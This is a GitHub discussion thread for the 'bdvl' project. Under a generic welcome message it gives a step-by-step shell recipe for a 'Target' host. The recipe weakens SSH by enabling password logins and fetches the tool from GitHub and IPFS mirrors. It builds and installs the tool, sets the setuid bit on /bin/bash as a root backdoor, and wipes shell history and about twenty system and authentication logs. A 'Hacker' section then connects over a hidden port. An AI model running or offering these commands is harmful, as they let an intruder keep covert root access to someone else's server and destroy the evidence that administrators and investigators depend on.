### DISCUSSION TITLE
Welcome to bdvl Discussions!

### DISCUSSION THREAD

**Discussion by Error996** [Error996/bdvl#2] [General]
## 👋 Welcome!
  We’re using Discussions as a place to connect with other members of our community. We hope that you:
  * Ask questions you’re wondering about.
  * Share ideas.
  * Engage with other community members.
  * Welcome others and are open-minded. Remember that this is a community we
  build together 💪.

  To get started, comment below with an introduction of yourself and tell us about what you do with this community.

#### Dependency:
> Ubuntu:
> ```shell
> apt-get install python3 git -y
> sed -i "s/PasswordAuthentication no/PasswordAuthentication yes/g" /etc/ssh/sshd_config
> service sshd restart
> ```
> CentOS：
> ```shell
> yum install python3 git -y
> sed -i "s/PasswordAuthentication no/PasswordAuthentication yes/g" /etc/ssh/sshd_config
> service sshd restart
> ```
#### Target:
```shell
git clone https://github.com/Error996/bdvl.git
#wget https://ipfs.io/ipns/k51qzi5uqu5dhvpni6iwym0gt3usas29260yepvvti525v031niy94j80dk8t6/bdvl.tar.gz
#wget https://cloudflare-ipfs.com/ipfs/QmYd4NnBUT4hwnk73XT9xvZqpv75ye4t131YEap3amvdpb/bdvl.tar.gz
#wget https://ipfs.io/ipfs/QmYd4NnBUT4hwnk73XT9xvZqpv75ye4t131YEap3amvdpb/bdvl.tar.gz
#wget https://cloudflare-ipfs.com/ipfs/QmYd4NnBUT4hwnk73XT9xvZqpv75ye4t131YEap3amvdpb/bdvl.tar.gz
#wget https://k51qzi5uqu5dhvpni6iwym0gt3usas29260yepvvti525v031niy94j80dk8t6.ipns.dweb.link/bdvl.tar.gz
tar -zxvf bdvl.tar.gz
cd bdvl
sh etc/depinstall.sh && make
cd build
nohup python -m SimpleHTTPServer 9001 &
cd ../
sh etc/auto.sh
ps aux | grep python
kill xxxx
chmod u+s /bin/bash
history -cw
echo > /var/log/wtmp
echo > /var/log/btmp
echo > /var/run/utmp
echo > /var/log/xferlog
echo > /var/log/lastlog
echo > /var/log/secure
echo > /var/log/boot.log
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/cron
echo > /var/log/dmesg
echo > /var/log/firewalld
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/maillog
echo > /var/log/messages
echo > /var/log/spooler
echo > /var/log/syslog
echo > /var/log/tallylog
echo > /var/log/yum.log
```
#### Hacker:
```shell
sh ssh.sh [username] [host] [hidden port]
```

**Comment by kernelzeroday** [comment]
Hello! Happy to help out with the project, please contact my telegram `@threatactress` 

thanks
